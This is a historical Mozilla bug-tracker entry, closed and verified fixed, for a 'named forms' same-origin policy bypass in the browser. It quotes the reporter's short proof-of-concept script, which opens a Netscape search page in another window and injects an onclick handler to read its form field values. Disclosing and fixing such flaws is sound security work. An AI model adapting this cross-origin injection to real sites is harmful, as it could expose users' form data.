Closed Bug 29712 Opened 25 years ago Closed 24 years ago

Named forms vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: fix in hand) 

Subject: 
        BUG: Named forms vulnerability
   Date: 
        Tue, 29 Feb 2000 14:33:28 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




Named forms are not protected by Same Origin security policy and allow
accessing the DOM of target documents.
The code is:
---------------------------------------------------------
<SCRIPT>
a=window.open("http://search.netscape.com","victim");
function f()
{

a.document.searchform.setAttribute("onclick","alert('value='+document.forms[0].e
lements[1].value)");
}
setTimeout("f()",10000);
</SCRIPT>
---------------------------------------------------------
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
May need to use the special /* ... */ as in

/dom/public/idl/html/HTMLFormElement.idl, line 23 -- jsval namedItem(/* ... */);
*** Bug 11734 has been marked as a duplicate of this bug. ***
Keywords: beta2
Whiteboard: fix in hand
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.